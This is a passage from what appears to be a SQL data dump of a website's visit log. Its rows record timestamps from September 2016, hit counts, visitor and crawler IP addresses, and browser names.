255.65.55','other'),(61750,1473632418,1,1,0,0,'163.172.65.245','other'),(61751,1473632927,1,0,1,0,'66.249.76.47',''),(61752,1473632941,1,1,0,0,'51.255.65.58','other'),(61753,1473633094,1,1,0,0,'51.255.65.49','other'),(61754,1473633453,1,1,0,0,'164.132.161.3','other'),(61755,1473633825,1,1,0,0,'163.172.66.135','other'),(61756,1473634134,1,0,1,0,'66.249.76.45',''),(61757,1473634878,1,0,1,0,'66.249.76.46',''),(61758,1473634911,1,0,1,0,'66.249.76.81',''),(61759,1473634980,1,1,0,0,'66.249.76.46','chrome'),(61760,1473636129,2,0,2,0,'66.249.76.46',''),(61761,1473636162,1,0,1,0,'66.249.76.77',''),(61762,1473637548,1,0,1,0,'66.249.76.46',''),(61763,1473637682,1,0,1,0,'66.249.66.87',''),(61764,1473637697,1,0,1,0,'66.249.76.45',''),(61765,1473641625,1,0,1,0,'66.249.76.47',''),(61766,1473642815,1,1,0,0,'157.55.39.0','other'),(61767,1473645984,1,1,0,0,'180.76.15.5','other'),(61768,1473646056,1,0,1,0,'66.249.76.47',''),(61769,1473647213,143,143,0,0,'163.172.49.61','other'),(61770,1473648116,157,157,0,0,'163.172.49.61','other'),(61771,1473651827,1,0,1,0,'66.249.76.47',''),(61772,1473651837,1,0,1,0,'66.249.76.79',''),(61773,1473652738,1,0,1,0,'66.249.66.81',''),(61774,1473652937,1,0,1,0,'66.249.76.47',''),(61775,1473654542,1,0,1,0,'66.249.76.45',''),(61776,1473655649,1,0,1,0,'66.249.76.46',''),(61777,1473655661,3,3,0,0,'85.14.244.113','other'),(61778,1473658151,1,1,0,0,'51.254.103.60','other'),(61779,1473659070,1,0,1,0,'66.249.76.45',''),(61780,1473659114,1,1,0,0,'37.55.160.149','chrome'),(61781,1473659168,1,0,1,0,'66.249.76.47',''),(61782,1473659526,2,2,0,0,'91.196.178.72','chrome'),(61783,1473660152,1,1,0,0,'91.196.178.134','chrome'),(61784,1473660350,1,0,1,0,'66.249.76.79',''),(61785,1473660699,1,1,0,0,'91.196.178.70','firefox'),(61786,1473661088,1,1,0,0,'195.211.175.37','chrome'),(61787,1473661955,1,1,0,0,'91.196.178.129','firefox'),(61788,1473662813,1,1,0,0,'66.249.76.45','chrome'),(61789,1473664204,1,1,0,0,'66.249.93.14','chrome'),(61790,1473665576,1,1,0,0,'157.55.39.52','other'),(61791,1473668020,1,1,0,0,'46.164.131.98','firefox'),(61792,1473668022,1,1,0,0,'213.108.45.138','chrome'),(61793,1473669277,1,1,0,0,'37.54.99.239','chrome'),(61794,1473669405,1,1,0,0,'78.111.187.124','chrome'),(61795,1473669445,1,1,0,0,'91.196.178.68','chrome'),(61796,1473669531,1,1,0,0,'94.179.44.95','chrome'),(61797,1473672365,1,0,1,0,'66.249.66.87',''),(61798,1473672495,2,0,2,0,'66.249.76.46',''),(61799,1473673038,1,1,0,0,'37.54.99.239','chrome'),(61800,1473673084,1,1,0,0,'91.196.178.71','chrome'),(61801,1473673193,1,0,1,0,'66.249.66.183',''),(61802,1473673777,1,1,0,0,'37.55.42.152','chrome'),(61803,1473674090,1,1,0,0,'37.73.203.218','chrome'),(61804,1473674571,1,1,0,0,'91.196.178.68','firefox'),(61805,1473674716,1,0,1,0,'66.249.76.46',''),(61806,1473675732,60,60,0,0,'138.201.127.112','other'),(61807,1473676054,1,1,0,0,'91.196.178.164','chrome'),(61808,1473676131,1,1,0,0,'37.54.21.101','firefox'),(61809,1473676522,1,1,0,0,'93.75.37.109','other'),(61810,1473677302,1,1,0,0,'91.196.178.34','chrome'),(61811,1473678128,2,0,2,0,'66.249.76.47',''),(61812,1473678653,1,1,0,0,'207.46.13.10','other'),(61813,1473678936,1,0,1,0,'66.249.76.77',''),(61814,1473679593,1,1,0,0,'66.249.76.47','chrome'),(61815,1473679682,1,1,0,0,'66.249.66.183','chrome'),(61816,1473680721,1,1,0,0,'91.196.178.68','chrome'),(61817,1473683794,1,1,0,0,'185.26.182.35','opera'),(61818,1473684383,1,1,0,0,'91.196.122.186','chrome'),(61819,1473684748,1,1,0,0,'95.132.112.129','firefox'),(61820,1473684861,1,1,0,0,'157.55.39.52','other'),(61821,1473686665,1,1,0,0,'92.113.36.163','chrome'),(61822,1473686810,1,1,0,0,'91.196.178.134','chrome'),(61823,1473687280,1,1,0,0,'180.76.15.14','other'),(61824,1473687565,1,1,0,0,'82.145.222.128','opera'),(61825,1473691853,1,0,1,0,'66.249.66.84',''),(61826,1473693796,1,0,1,0,'66.249.66.84',''),(61827,1473694157,1,1,0,0,'5.45.192.115','chrome'),(61828,1473694253,1,1,0,0,'91.196.178.68','firefox'),(61829,1473696478,1,1,0,0,'157.55.39.0','other'),(61830,1473700160,1,1,0,0,'92.113.168.39','opera'),(61831,1473700737,1,1,0,0,'82.145.223.150','opera'),(61832,1473702391,1,1,0,0,'82.145.223.145','other'),(61833,1473702415,1,1,0,0,'40.77.167.12','other'),(61834,1473702593,1,1,0,0,'82.145.223.150','opera'),(61835,1473703590,1,1,0,0,'46.211.250.91','chrome'),(61836,1473705107,1,1,0,0,'91.196.178.70','chrome'),(61837,1473706422,1,1,0,0,'37.55.226.206','firefox'),(61838,1473708203,1,1,0,0,'185.26.180.169','opera'),(61839,1473711325,1,1,0,0,'151.80.44.115','other'),(61840,1473711732,1,1,0,0,'82.145.222.69','chrome'),(61841,1473714347,1,0,1,0,'66.249.76.45',''),(61842,1473718350,1,0,1,0,'68.180.230.222',''),(61843,1473721253,1,1,0,0,'66.249.76.46','chrome'),(61844,1473724463,1,0,1,0,'66.249.76.45',''),(61845,1473725117,1,1,0,0,'66.102.9.29','other'),(61846,1473728717,1,1,0,0,'66.102.9.27','other'),(61847,1473731620,1,1,0,0,'207.46.13.189','other'),(61848,1473732314,1,1,0,0,'66.102.9.27','other'),(61849,1473733296,2,2,0,0,'207.46.13.155','other'),(61850,1473733608,1,0,1,0,'66.249.75.20',''),(61851,1473735915,1,1,0,0,'66.102.9.27','other'),(61852,1473738520,1,0,1,0,'66.249.75.24',''),(61853,1473739148,1,1,0,0,'207.46.13.155','other'),(61854,1473739518,1,1,0,0,'66.102.9.29','other'),(61855,1473741236,1,1,0,0,'66.249.76.46','chrome'),(61856,1473742725,1,1,0,0,'82.145.220.192','opera'),(61857,1473743113,1,1,0,0,'66.102.9.25','other'),(61858,1473743363,2,2,0,0,'91.196.178.68','chrome'),(61859,1473744046,1,1,0,0,'130.193.50.34','other'),(61860,1473744992,13,13,0,0,'91.121.86.136','other'),(61861,1473746469,1,1,0,0,'94.179.2.157','firefox'),(61862,1473748034,1,1,0,0,'66.249.76.47','chrome'),(61863,1473748892,1,1,0,0,'207.46.13.155','other'),(61864,1473749212,1,1,0,0,'91.196.178.72','chrome'),(61865,1473751455,1,1,0,0,'130.193.50.34','other'),(61866,1473751761,2,0,2,0,'66.249.76.45',''),(61867,1473752661,1,1,0,0,'5.255.250.41','other'),(61868,1473752680,1,0,1,0,'66.249.76.46',''),(61869,1473752922,1,1,0,0,'207.46.13.189','other'),(61870,1473753917,1,1,0,0,'66.102.9.25','other'),(61871,1473753986,1,0,1,0,'66.249.76.46',''),(61872,1473754587,1,1,0,0,'93.73.234.193','firefox'),(61873,1473754809,1,1,0,0,'194.146.139.229','chrome'),(61874,1473754954,1,1,0,0,'141.0.12.156','opera'),(61875,1473755158,1,1,0,0,'66.249.76.45','chrome'),(61876,1473755266,1,1,0,0,'66.249.76.77','chrome'),(61877,1473756041,1,1,0,0,'94.179.53.137','firefox'),(61878,1473756140,1,1,0,0,'180.76.15.147','other'),(61879,1473756512,1,1,0,0,'37.52.18.31','firefox'),(61880,1473757083,1,1,0,0,'193.34.141.59','chrome'),(61881,1473757517,1,1,0,0,'66.102.9.27','other'),(61882,1473758095,1,1,0,0,'180.76.15.142','other'),(61883,1473758411,1,0,1,0,'66.249.76.47',''),(61884,1473758439,1,1,0,0,'207.46.13.128','other'),(61885,1473758941,1,1,0,0,'91.196.178.71','firefox'),(61886,1473759001,1,1,0,0,'130.193.50.34','other'),(61887,1473759246,1,1,0,0,'66.249.93.13','chrome'),(61888,1473760237,1,1,0,0,'5.254.65.15','chrome'),(61889,1473761113,1,1,0,0,'66.102.9.29','other'),(61890,1473761832,1,1,0,0,'5.255.250.41','other'),(61891,1473762582,1,0,1,0,'66.249.76.45',''),(61892,1473763209,1,1,0,0,'95.134.110.157','opera'),(61893,1473764376,1,1,0,0,'37.115.97.155','firefox'),(61894,1473764714,1,1,0,0,'66.102.9.25','other'),(61895,1473765512,1,1,0,0,'178.151.8.41','firefox'),(61896,1473765639,5,5,0,0,'192.187.104.235','other'),(61897,1473765782,1,1,0,0,'194.44.18.34','chrome'),(61898,1473765807,1,1,0,0,'82.145.223.34','opera'),(61899,1473767241,1,1,0,0,'92.113.30.223','chrome'),(61900,1473767341,1,1,0,0,'91.196.178.66','firefox'),(61901,1473767408,1,1,0,0,'91.196.178.169','chrome'),(61902,1473768031,1,1,0,0,'91.196.179.33','firefox'),(61903,1473768315,1,1,0,0,'66.102.9.29','other'),(61904,1473768739,1,1,0,0,'94.179.247.157','chrome'),(61905,1473768961,1,1,0,0,'91.196.178.38','chrome'),(61906,1473769117,1,1,0,0,'178.93.31.175','chrome'),(61907,1473769606,1,1,0,0,'207.46.13.128','other'),(61908,1473770360,1,1,0,0,'91.196.178.38','firefox'),(61909,1473770489,163,163,0,0,'208.43.225.84','other'),(61910,1473770724,100,100,0,0,'208.43.225.85','other'),(61911,1473771915,1,1,0,0,'66.102.9.29','other'),(61912,1473772243,17,17,0,0,'213.251.184.38','other'),(61913,1473773071,1,1,0,0,'37.53.229.135','chrome'),(61914,1473773562,1,1,0,0,'91.196.178.70','firefox'),(61915,1473774725,16,16,0,0,'51.255.194.3','other'),(61916,1473775398,1,1,0,0,'91.196.179.61','chrome'),(61917,1473775440,1,1,0,0,'178.92.171.214','chrome'),(61918,1473775461,1,1,0,0,'130.193.51.19','other'),(61919,1473775513,1,1,0,0,'66.102.9.29','other'),(61920,1473775527,2,2,0,0,'141.8.142.58','other'),(61921,1473775745,2,2,0,0,'130.193.50.34','other'),(61922,1473776008,1,1,0,0,'91.196.178.66','firefox'),(61923,1473776011,1,1,0,0,'141.8.142.67','other'),(61924,1473776192,1,1,0,0,'95.111.132.73','chrome'),(61925,1473779113,1,1,0,0,'66.102.9.25','other'),(61926,1473779860,2,0,2,0,'66.249.76.45',''),(61927,1473780040,1,1,0,0,'91.196.177.15','chrome'),(61928,1473780567,1,1,0,0,'130.193.51.19','other'),(61929,1473780592,2,2,0,0,'141.8.183.25','other'),(61930,1473780726,1,1,0,0,'141.8.142.58','other'),(61931,1473781491,1,1,0,0,'91.196.177.15','chrome'),(61932,1473781529,1,1,0,0,'95.133.24.141','firefox'),(61933,1473782714,1,1,0,0,'66.102.9.25','other'),(61934,1473783359,1,0,1,0,'66.249.75.16',''),(61935,1473783416,1,1,0,0,'37.54.21.130','chrome'),(61936,1473784385,1,1,0,0,'94.179.98.112','firefox'),(61937,1473784564,1,1,0,0,'207.46.13.128','other'),(61938,1473784570,1,1,0,0,'91.196.178.103','chrome'),(61939,1473785146,1,1,0,0,'130.193.50.34','other'),(61940,1473785492,2,0,2,0,'66.249.76.45',''),(61941,1473785523,1,0,1,0,'66.249.76.77',''),(61942,1473786313,1,1,0,0,'66.102.9.25','other'),(61943,1473786952,1,0,1,0,'66.249.75.24',''),(61944,1473786990,1,1,0,0,'130.193.51.19','other'),(61945,1473787119,1,1,0,0,'37.54.115.30','firefox'),(61946,1473788054,1,1,0,0,'91.196.178.65','chrome'),(61947,1473789181,1,1,0,0,'94.179.92.37','chrome'),(61948,1473789570,1,1,0,0,'207.46.13.189','other'),(61949,1473789889,1,1,0,0,'46.211.23.6','firefox'),(61950,1473789914,1,1,0,0,'66.102.9.25','other'),(61951,1473791672,42,42,0,0,'209.58.178.49','other'),(61952,1473792623,1,0,1,0,'66.249.76.45',''),(61953,1473792663,1,1,0,0,'141.8.183.25','other'),(61954,1473793262,1,1,0,0,'94.179.104.97','chrome'),(61955,1473793481,1,1,0,0,'217.69.133.217','other'),(61956,1473795387,1,0,1,0,'66.249.76.47',''),(61957,1473797114,1,1,0,0,'66.102.9.25','other'),(61958,1473797890,1,0,1,0,'66.249.69.69',''),(61959,1473800635,2,2,0,0,'51.255.194.3','other'),(61960,1473800714,1,1,0,0,'207.46.13.155','other'),(61961,1473800717,1,1,0,0,'66.102.9.27','other'),(61962,1473800934,1,0,1,0,'66.249.76.46',''),(61963,1473800980,1,0,1,0,'66.249.75.179',''),(61964,1473801224,1,1,0,0,'217.69.133.191','other'),(61965,1473801380,1,1,0,0,'130.193.50.34','other'),(61966,1473803521,1,0,1,0,'66.249.75.187',''),(61967,1473804480,1,1,0,0,'109.63.160.44','msie'),(61968,1473804481,1,1,0,0,'95.46.246.174','msie'),(61969,1473804486,1,1,0,0,'37.145.122.164','msie'),(61970,1473804496,1,1,0,0,'188.32.23.164','msie'),(61971,1473804497,1,1,0,0,'176.193.173.115','msie'),(61972,1473805163,1,1,0,0,'130.193.50.34','other'),(61973,1473806385,1,1,0,0,'180.76.15.159','other'),(61974,1473806599,1,0,1,0,'66.249.76.47',''),(61975,1473807230,1,0,1,0,'66.249.76.46',''),(61976,1473807802,1,1,0,0,'157.55.39.111','other'),(61977,1473807828,1,1,0,0,'66.249.75.183','chrome'),(61978,1473809576,1,1,0,0,'130.193.50.34','other'),(61979,1473811129,1,0,1,0,'66.249.75.183',''),(61980,1473811731,1,0,1,0,'66.249.76.46',''),(61981,1473811734,1,0,1,0,'66.249.76.45',''),(61982,1473812529,2,2,0,0,'89.98.141.205','other'),(61983,1473812841,1,1,0,0,'217.69.133.218','other'),(61984,1473815684,2,2,0,0,'144.76.8.132','other'),(61985,1473817444,1,0,1,0,'66.249.76.77',''),(61986,1473821867,2,2,0,0,'5.9.111.70','other'),(61987,1473822347,1,0,1,0,'66.249.76.46',''),(61988,1473822878,1,0,1,0,'66.249.76.45',''),(61989,1473822885,1,0,1,0,'66.249.75.183',''),(61990,1473823603,1,1,0,0,'130.193.50.34','other'),(61991,1473823760,1,1,0,0,'207.46.13.3','other'),(61992,1473824975,1,1,0,0,'207.46.13.3','other'),(61993,1473826726,1,1,0,0,'104.131.165.196','other'),(61994,1473826886,1,1,0,0,'128.68.2.116','other'),(61995,1473827697,1,0,1,0,'66.249.75.179',''),(61996,1473827841,1,1,0,0,'95.24.120.24','msie'),(61997,1473828627,1,0,1,0,'66.249.75.179',''),(61998,1473828945,1,1,0,0,'207.46.13.3','other'),(61999,1473830183,1,1,0,0,'141.0.13.47','opera'),(62000,1473830764,1,1,0,0,'178.93.47.112','chrome'),(62001,1473830883,1,1,0,0,'94.179.53.137','firefox'),(62002,1473832026,1,1,0,0,'91.196.178.72','chrome'),(62003,1473832328,1,1,0,0,'194.44.18.34','chrome'),(62004,1473832409,1,0,1,0,'66.249.76.46',''),(62005,1473832763,1,1,0,0,'91.196.178.71','firefox'),(62006,1473833177,1,1,0,0,'91.196.178.162','chrome'),(62007,1473833701,1,1,0,0,'91.196.178.72','chrome'),(62008,1473833731,1,1,0,0,'91.196.178.71','firefox'),(62009,1473834172,1,1,0,0,'180.76.15.31','other'),(62010,1473834311,1,1,0,0,'66.249.93.13','chrome'),(62011,1473834945,1,0,1,0,'66.249.76.46',''),(62012,1473836233,1,1,0,0,'31.43.229.94','chrome'),(62013,1473836290,1,1,0,0,'91.196.178.68','chrome'),(62014,1473837246,2,2,0,0,'176.96.197.180','firefox'),(62015,1473837307,1,1,0,0,'77.37.131.134','msie'),(62016,1473837329,1,0,1,0,'66.249.76.45',''),(62017,1473837332,2,0,2,0,'66.249.76.46',''),(62018,1473837338,1,1,0,0,'66.249.69.187','chrome'),(62019,1473837345,4,1,3,0,'66.249.76.45',''),(62020,1473837346,4,4,0,0,'69.30.205.218','other'),(62021,1473839839,1,0,1,0,'66.249.76.46',''),(62022,1473839868,1,0,1,0,'66.249.69.185',''),(62023,1473840242,1,1,0,0,'188.32.71.228','msie'),(62024,1473840923,1,0,1,0,'66.249.69.185',''),(62025,1473840986,1,1,0,0,'66.249.69.189','chrome'),(62026,1473842321,1,1,0,0,'66.249.76.47','chrome'),(62027,1473843311,1,1,0,0,'94.179.4.67','firefox'),(62028,1473843785,1,1,0,0,'69.30.198.178','other'),(62029,1473844676,1,1,0,0,'91.196.178.169','chrome'),(62030,1473845047,1,1,0,0,'91.196.178.162','chrome'),(62031,1473845766,25,25,0,0,'5.9.62.130','other'),(62032,1473846681,1,1,0,0,'207.46.13.3','other'),(62033,1473846883,1,1,0,0,'213.169.82.245','chrome'),(62034,1473847306,1,1,0,0,'91.196.178.71','chrome'),(62035,1473847438,1,1,0,0,'178.94.213.149','chrome'),(62036,1473847628,1,1,0,0,'95.133.40.9','chrome'),(62037,1473847876,1,0,1,0,'66.249.76.77',''),(62038,1473849333,4,4,0,0,'62.210.148.246','other'),(62039,1473849408,1,1,0,0,'91.196.178.68','chrome'),(62040,1473850498,1,1,0,0,'180.76.15.150','other'),(62041,1473850546,1,1,0,0,'91.196.178.69','chrome'),(62042,1473850914,1,1,0,0,'91.196.178.68','chrome'),(62043,1473851740,1,1,0,0,'207.46.13.3','other'),(62044,1473851922,1,1,0,0,'91.196.178.162','chrome'),(62045,1473853440,1,0,1,0,'66.249.69.187',''),(62046,1473856311,1,0,1,0,'66.249.76.46',''),(62047,1473857666,1,1,0,0,'46.211.23.6','firefox'),(62048,1473858009,1,1,0,0,'91.196.178.71','firefox'),(62049,1473858106,1,1,0,0,'40.77.167.0','other'),(62050,1473858314,1,1,0,0,'66.102.9.27','other'),(62051,1473858781,2,2,0,0,'5.9.123.116','other'),(62052,1473859107,1,1,0,0,'92.112.231.200','opera'),(62053,1473859292,1,1,0,0,'5.9.88.103','other'),(62054,1473861914,1,1,0,0,'66.102.9.25','other'),(62055,1473862117,1,1,0,0,'37.52.77.35','chrome'),(62056,1473862467,1,1,0,0,'180.76.15.162','other'),(62057,1473862799,1,1,0,0,'217.69.133.249','other'),(62058,1473863513,1,1,0,0,'217.69.133.238','other'),(62059,1473864713,1,0,1,0,'66.249.76.46',''),(62060,1473864730,1,1,0,0,'217.69.133.9','other'),(62061,1473865265,1,1,0,0,'91.196.178.66','firefox'),(62062,1473865455,2,0,2,0,'68.180.230.236',''),(62063,1473865515,1,1,0,0,'66.102.9.25','other'),(62064,1473866511,2,2,0,0,'94.179.64.148','chrome'),(62065,1473869112,1,1,0,0,'66.102.9.25','other'),(62066,1473872171,1,1,0,0,'91.196.178.66','firefox'),(62067,1473872712,1,1,0,0,'66.102.9.29','other'),(62068,1473872886,1,1,0,0,'91.124.182.3','firefox'),(62069,1473873545,1,1,0,0,'94.179.31.144','chrome'),(62070,1473876470,1,1,0,0,'66.102.9.27','other'),(62071,1473876781,1,0,1,0,'66.249.76.45',''),(62072,1473878223,1,1,0,0,'82.145.221.222','other'),(62073,1473879070,1,1,0,0,'91.196.178.36','chrome'),(62074,1473879775,1,1,0,0,'66.249.76.47','chrome'),(62075,1473880024,1,1,0,0,'66.102.9.25','other'),(62076,1473881379,1,1,0,0,'141.0.12.180','other'),(62077,1473881588,1,1,0,0,'66.249.76.46','chrome'),(62078,1473881765,1,1,0,0,'66.249.76.47','chrome'),(62079,1473882436,1,1,0,0,'66.249.76.45','chrome'),(62080,1473882624,1,1,0,0,'178.92.8.242','chrome'),(62081,1473883621,1,1,0,0,'66.102.9.29','other'),(62082,1473884461,1,1,0,0,'157.55.39.199','other'),(62083,1473884724,1,1,0,0,'66.249.76.79','chrome'),(62084,1473885150,5,5,0,0,'136.243.152.18','other'),(62085,1473885372,1,1,0,0,'217.69.133.23','other'),(62086,1473886739,1,0,1,0,'66.249.76.47',''),(62087,1473886926,1,1,0,0,'188.32.53.230','other'),(62088,1473887231,1,1,0,0,'66.102.9.27','other'),(62089,1473887511,1,1,0,0,'46.4.120.3','other'),(62090,1473890113,1,1,0,0,'66.249.93.14','chrome'),(62091,1473890401,1,1,0,0,'40.77.167.68','other'),(62092,1473890882,1,1,0,0,'66.102.9.25','other'),(62093,1473894611,1,1,0,0,'66.102.9.25','other'),(62094,1473894872,1,1,0,0,'180.76.15.145','other'),(62095,1473896295,5,5,0,0,'5.9.151.22','other'),(62096,1473897054,1,1,0,0,'95.28.59.25','firefox'),(62098,1473897055,1,1,0,0,'95.24.48.195','chrome'),(62099,1473897057,1,1,0,0,'128.72.70.164','chrome'),(62100,1473897058,1,1,0,0,'95.221.229.47','chrome'),(62101,1473897967,1,1,0,0,'66.102.9.29','other'),(62102,1473901219,1,0,1,0,'66.249.76.45',''),(62103,1473901971,1,1,0,0,'66.102.9.29','other'),(62104,1473903380,1,0,1,0,'66.249.76.45',''),(62105,1473905303,1,1,0,0,'66.102.9.29','other'),(62106,1473908399,1,1,0,0,'180.76.15.12','other'),(62107,1473908967,1,1,0,0,'66.102.9.27','other'),(62108,1473916149,1,1,0,0,'91.196.178.71','firefox'),(62109,1473916950,1,1,0,0,'94.179.4.67','firefox'),(62110,1473917382,1,1,0,0,'40.77.167.0','other'),(62111,1473919230,1,1,0,0,'91.196.178.71','firefox'),(62112,1473919525,1,1,0,0,'91.196.178.71','chrome'),(62113,1473921166,1,0,1,0,'66.249.66.183',''),(62114,1473921181,1,0,1,0,'66.249.76.79',''),(62115,1473921306,1,0,1,0,'66.249.76.45',''),(62116,1473921429,2,1,1,0,'66.249.76.45',''),(62117,1473921748,1,1,0,0,'91.196.178.71','firefox'),(62118,1473922191,1,1,0,0,'94.153.134.42','chrome'),(62119,1473922603,1,0,1,0,'66.249.66.84',''),(62120,1473922863,8,8,0,0,'199.58.86.211','other'),(62121,1473924248,1,0,1,0,'66.249.76.46',''),(62122,1473925182,1,1,0,0,'91.196.178.72','firefox'),(62123,1473925191,2,2,0,0,'91.196.178.71','firefox'),(62124,1473925325,1,1,0,0,'180.76.15.163','other'),(62125,1473925685,1,1,0,0,'66.102.9.25','chrome'),(62126,1473926041,1,1,0,0,'185.84.148.4','firefox'),(62127,1473926096,1,1,0,0,'91.196.178.71','firefox'),(62128,1473928991,1,1,0,0,'82.207.122.103','opera'),(62129,1473929041,1,1,0,0,'130.193.51.19','other'),(62130,1473929397,1,1,0,0,'107.167.104.17','opera'),(62131,1473930046,1,1,0,0,'91.209.118.6','firefox'),(62132,1473934544,1,1,0,0,'94.231.178.194','chrome'),(62133,1473934847,1,1,0,0,'40.77.167.44','other'),(62134,1473935029,1,1,0,0,'91.196.178.164','chrome'),(62135,1473935128,1,1,0,0,'91.229.121.1','chrome'),(62136,1473935153,1,1,0,0,'141.8.183.25','other'),(62137,1473935811,64,64,0,0,'144.76.12.75','other'),(62138,1473936899,1,1,0,0,'66.249.93.89','chrome'),(62139,1473937112,2,2,0,0,'130.180.218.231','chrome'),(62140,1473937133,1,1,0,0,'130.193.50.34','other'),(62141,1473937239,1,0,1,0,'66.249.76.89',''),(62142,1473937265,2,2,0,0,'91.196.176.13','chrome'),(62143,1473938107,2,2,0,0,'94.179.61.93','chrome'),(62144,1473938449,1,1,0,0,'174.129.237.157','other'),(62145,1473940031,2,2,0,0,'91.196.178.72','chrome'),(62146,1473940447,1,1,0,0,'91.196.176.13','chrome'),(62147,1473940690,1,1,0,0,'180.76.15.153','other'),(62148,1473941394,1,1,0,0,'66.102.9.29','other'),(62149,1473941775,2,2,0,0,'69.30.205.218','other'),(62150,1473941886,1,0,1,0,'66.249.76.87',''),(62151,1473942655,1,1,0,0,'91.196.178.72','other'),(62152,1473942735,3,0,3,0,'68.180.230.181',''),(62153,1473944165,1,1,0,0,'95.135.91.33','chrome'),(62154,1473944535,1,0,1,0,'66.249.76.91',''),(62155,1473944713,1,1,0,0,'66.102.9.27','other'),(62156,1473945773,1,1,0,0,'91.196.178.68','chrome'),(62157,1473945822,1,1,0,0,'37.54.17.211','firefox'),(62158,1473946170,2,0,2,0,'66.249.76.87',''),(62159,1473946207,1,0,1,0,'66.249.66.87',''),(62160,1473946587,1,1,0,0,'195.149.70.22','chrome'),(62161,1473946878,1,1,0,0,'91.196.178.71','firefox'),(62162,1473947193,1,1,0,0,'91.196.178.68','chrome'),(62163,1473947356,1,1,0,0,'176.113.175.227','chrome'),(62164,1473947664,1,1,0,0,'91.196.178.71','chrome'),(62165,1473947991,1,0,1,0,'66.249.76.91',''),(62166,1473948437,1,1,0,0,'66.102.9.29','other'),(62167,1473948445,1,0,1,0,'68.180.230.181',''),(62168,1473949097,1,1,0,0,'91.196.178.38','firefox'),(62169,1473950135,17,17,0,0,'91.121.109.55','other'),(62170,1473951457,1,1,0,0,'91.196.178.68','firefox'),(62171,1473951719,1,1,0,0,'91.196.177.15','firefox'),(62172,1473952657,1,1,0,0,'66.102.9.25','other'),(62173,1473954664,1,1,0,0,'46.211.115.88','chrome'),(62174,1473955013,1,1,0,0,'91.196.178.161','other'),(62175,1473955077,1,0,1,0,'66.249.76.108',''),(62176,1473955525,1,1,0,0,'66.102.9.29','other'),(62177,1473958569,1,1,0,0,'91.124.182.3','firefox'),(62178,1473959344,1,1,0,0,'66.102.9.29','other'),(62179,1473962711,1,0,1,0,'66.249.66.84',''),(62180,1473962712,1,1,0,0,'66.102.9.29','other'),(62181,1473963729,1,0,1,0,'68.180.230.236',''),(62182,1473964690,1,1,0,0,'46.211.204.11','chrome'),(62183,1473965221,1,1,0,0,'207.46.13.185','other'),(62184,1473965934,1,0,1,0,'66.249.76.47',''),(62185,1473966335,1,1,0,0,'66.102.9.27','other'),(62186,1473967170,1,0,1,0,'68.180.230.236',''),(62187,1473969913,1,1,0,0,'66.102.9.25','other'),(62188,1473971020,3,3,0,0,'78.170.66.162','other'),(62189,1473973627,1,1,0,0,'66.102.9.27','other'),(62190,1473973862,1,0,1,0,'68.180.230.236',''),(62191,1473973972,1,0,1,0,'66.249.76.47',''),(62192,1473975650,1,0,1,0,'66.249.76.47',''),(62193,1473975985,4,4,0,0,'144.76.61.21','other'),(62194,1473977375,1,1,0,0,'66.102.9.29','other'),(62195,1473977497,1,0,1,0,'66.249.76.47',''),(62196,1473977632,29,29,0,0,'193.111.140.106','other'),(62197,1473977635,40,40,0,0,'85.14.244.113','other'),(62198,1473977637,34,34,0,0,'85.14.244.98','other'),(62199,1473977912,1,1,0,0,'66.249.76.47','chrome'),(62200,1473978425,1,1,0,0,'174.129.237.157','other'),(62201,1473980279,1,1,0,0,'207.46.13.185','other'),(62202,1473980994,1,1,0,0,'66.102.9.29','other'),(62203,1473984311,1,1,0,0,'66.102.9.25','other'),(62204,1473984494,1,1,0,0,'174.129.237.157','other'),(62205,1473985249,1,1,0,0,'180.76.15.160','other'),(62206,1473986286,1,1,0,0,'207.46.13.99','other'),(62207,1473986811,1,0,1,0,'66.249.76.79',''),(62208,1473987343,1,0,1,0,'66.249.76.46',''),(62209,1473987424,3,0,3,0,'66.249.76.45',''),(62210,1473987907,1,0,1,0,'66.249.76.47',''),(62211,1473987911,1,1,0,0,'66.102.9.29','other'),(62212,1473989119,1,1,0,0,'66.249.76.47','chrome'),(62213,1473990891,1,1,0,0,'174.129.237.157','other'),(62214,1473990913,1,0,1,0,'66.249.66.87',''),(62215,1473991511,1,1,0,0,'66.102.9.25','other'),(62216,1473991852,1,0,1,0,'66.249.66.87',''),(62217,1473991934,1,0,1,0,'66.249.76.46',''),(62218,1473992041,1,1,0,0,'141.8.142.61','other'),(62219,1473994632,1,0,1,0,'66.249.66.84',''),(62220,1473995111,1,1,0,0,'66.102.9.27','other'),(62221,1473995301,1,0,1,0,'66.249.76.46',''),(62222,1473996511,1,1,0,0,'128.72.44.254','other'),(62223,1473997533,1,1,0,0,'141.8.183.25','other'),(62224,1473998239,1,1,0,0,'141.8.184.11','other'),(62225,1473998711,1,1,0,0,'66.102.9.29','other'),(62226,1473999165,1,0,1,0,'66.249.76.46',''),(62227,1474000269,1,1,0,0,'180.76.15.32','other'),(62228,1474000271,1,1,0,0,'180.76.15.162','other'),(62229,1474000719,1,1,0,0,'66.249.76.46','chrome'),(62230,1474002337,1,1,0,0,'66.102.9.27','other'),(62231,1474002872,1,0,1,0,'66.249.76.46',''),(62232,1474003384,1,1,0,0,'91.196.178.71','firefox'),(62233,1474004649,1,1,0,0,'94.179.41.176','firefox'),(62234,1474005302,1,1,0,0,'66.249.93.14','chrome'),(62235,1474006026,1,1,0,0,'66.102.9.27','other'),(62236,1474006767,1,1,0,0,'37.53.196.211','chrome'),(62237,1474006965,1,1,0,0,'91.196.178.72','firefox'),(62238,1474010123,1,0,1,0,'66.249.66.84',''),(62239,1474011911,1,1,0,0,'207.46.13.99','other'),(62240,1474012342,1,0,1,0,'66.249.76.46',''),(62241,1474012611,1,1,0,0,'91.196.178.165','chrome'),(62242,1474013237,1,1,0,0,'91.196.178.72','chrome'),(62243,1474014960,1,0,1,0,'68.180.230.181',''),(62244,1474015172,1,1,0,0,'91.196.178.71','firefox'),(62245,1474015569,1,1,0,0,'31.43.1.183','chrome'),(62246,1474016004,1,1,0,0,'212.1.108.150','chrome'),(62247,1474016074,1,0,1,0,'66.249.76.46',''),(62248,1474016423,1,1,0,0,'207.46.13.99','other'),(62249,1474016641,1,1,0,0,'82.145.221.84','opera'),(62250,1474016701,1,1,0,0,'69.30.198.242','other'),(62251,1474016791,2,2,0,0,'46.4.120.3','other'),(62252,1474016799,1,1,0,0,'91.196.178.71','firefox'),(62253,1474017209,1,0,1,0,'66.249.76.47',''),(62254,1474017634,1,1,0,0,'91.196.178.66','firefox'),(62255,1474017662,2,2,0,0,'91.196.178.67','firefox'),(62256,1474017711,1,1,0,0,'94.179.36.129','chrome'),(62257,1474018203,1,1,0,0,'91.196.178.71','firefox'),(62258,1474018324,1,0,1,0,'66.24